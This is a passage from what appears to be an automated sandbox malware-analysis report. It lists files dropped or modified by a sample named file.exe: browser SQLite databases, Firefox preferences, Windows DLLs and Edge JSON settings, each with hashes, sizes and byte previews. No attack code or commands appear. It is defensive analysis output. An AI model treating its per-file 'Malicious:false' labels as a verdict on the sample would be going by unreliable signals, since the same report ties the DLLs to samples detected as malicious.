                                                                                                                                                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.137181696973627
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                                                                                                                                                                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                                                                                                                                                                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                                                                                                                                                                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                                                                                                                                                                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1769), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):9370
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.514140640374404
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
                                                                                                                                                                                                                                                                                                                    MD5:7E44458E0A8A3A7D10875BC3B7AE72D1
                                                                                                                                                                                                                                                                                                                    SHA1:E5E6AC8676EE3761DAB13A10EB7573C19F48D297
                                                                                                                                                                                                                                                                                                                    SHA-256:21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
                                                                                                                                                                                                                                                                                                                    SHA-512:012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):5242880
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.03786218306281921
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
                                                                                                                                                                                                                                                                                                                    MD5:4BB4A37B8E93E9B0F5D3DF275799D45E
                                                                                                                                                                                                                                                                                                                    SHA1:E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
                                                                                                                                                                                                                                                                                                                    SHA-256:89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
                                                                                                                                                                                                                                                                                                                    SHA-512:F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):685392
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: vwkb5DQRAL.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):608080
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: vwkb5DQRAL.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):450024
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):257872
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):80880
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):46213
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.086385081823897
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:0MkbJrT8IeQc5/aEj+KKGf4c2np4mPLg9EprOjlqObi0JCioj7DRo+yM/42cRaLe:0Mk1rT8HHa9KjQObFJFoj7VLyMV/YosF
                                                                                                                                                                                                                                                                                                                    MD5:EF7C33ED20F58270C44909AD26265A10
                                                                                                                                                                                                                                                                                                                    SHA1:5DBA0C065E2A375668B0F1C633AD4009B62E547C
                                                                                                                                                                                                                                                                                                                    SHA-256:27581DB539E8546A3B9D920A650E8807EEEF20CD7095A441497DF5E00326CD81
                                                                                                                                                                                                                                                                                                                    SHA-512:4814B5B325EF01EC7AD3DFF0517019BF30F3CF0F58544002B6447A6401A36CED06B2600B2FFDC470F4CAF06BD891516737A3AA00E6948E1D30DEC1DC9DB2C53B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5126aade-6a68-4155-9c9e-d717e6cc761b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):46089
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.08672465933633
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:0MkbJrT8IeQc5da/+KKGf4c2nS4mPLg9EprOjlqObi0JCioj7DRo+yM/42cRaLMt:0Mk1rT8H1aUhjQObFJFoj7VLyMV/YosF
                                                                                                                                                                                                                                                                                                                    MD5:C105454CDB852AE53D049A91EA6B9872
                                                                                                                                                                                                                                                                                                                    SHA1:705DC4779BEDB344B68065D0D672334CF56B6BF1
                                                                                                                                                                                                                                                                                                                    SHA-256:8440EFCBE982236D623C99B754DE91B0BD213471FC6582681F5B3B60088FF678
                                                                                                                                                                                                                                                                                                                    SHA-512:EA58EBEBB8068451691AFED3A793DAB654E0CAAFE50E8957024A25749FFF8641660871DF22C74C18FD1D7CC25AF822D3A5A343D422603DFAD88551321A5D7555
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5126aade-6a68-4155-9c9e-d717e6cc761b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                    Size (bytes):46213
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.086385154382638
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:0MkbJrT8IeQc5/nEj+KKGf4c2np4mPLg9EprOjlqObi0JCioj7DRo+yM/42cRaLe:0Mk1rT8HHn9KjQObFJFoj7VLyMV/YosF
                                                                                                                                                                                                                                                                                                                    MD5:064936B84744D52B8D6ACD2C7C356536
                                                                                                                                                                                                                                                                                                                    SHA1:BD1390C032A10C3C4B49122DE96D65C98E7AA263
                                                                                                                                                                                                                                                                                                                    SHA-256:3175A63DCAF817C0F0C963341EEA8FED4DD96E18D321995EF17185670F625B25
                                                                                                                                                                                                                                                                                                                    SHA-512:EC1306929CCF16E3341CEBA95DCAFF0F140473C00E61564326B15FEE09A15A10A96478BE7A6B07D91CBCBA79A9657A9B3DCC649975F73572AD4F047009A88E1A
                                                                                                                                                                                                                                                                                                                    Malicious:false
